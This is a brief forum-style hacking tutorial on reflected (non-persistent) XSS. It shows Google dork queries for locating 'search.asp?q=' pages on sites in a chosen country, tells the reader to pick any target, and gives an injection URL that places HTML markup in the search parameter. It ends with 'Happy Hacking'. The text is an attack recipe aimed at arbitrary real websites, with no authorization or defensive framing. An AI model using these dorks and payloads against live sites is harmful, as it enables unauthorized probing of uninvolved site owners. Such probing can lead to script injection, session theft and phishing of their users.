Basic Non-Persistent XSS Tutorial
1)Open Browser (better to use firefox)
2)Type google.com
3)Search for inurl:"site:.(country code of your target ex. .in)" "search.asp?q="
sample:
- Code:
-
inurl:"site:.in" "search.asp?q="
or
- Code:
-
"search.asp?q=" site:in
4)Choose any targets because there's a lot of website like
- Code:
-
www.site.com/search.asp?q=
5)Insert script or inject like this
- Code:
-
www.site.com/search.asp?q="<h1>Hello Admin</h1>
6)Done
Demo Site:
[You must be registered and logged in to see this link.]Happy Hacking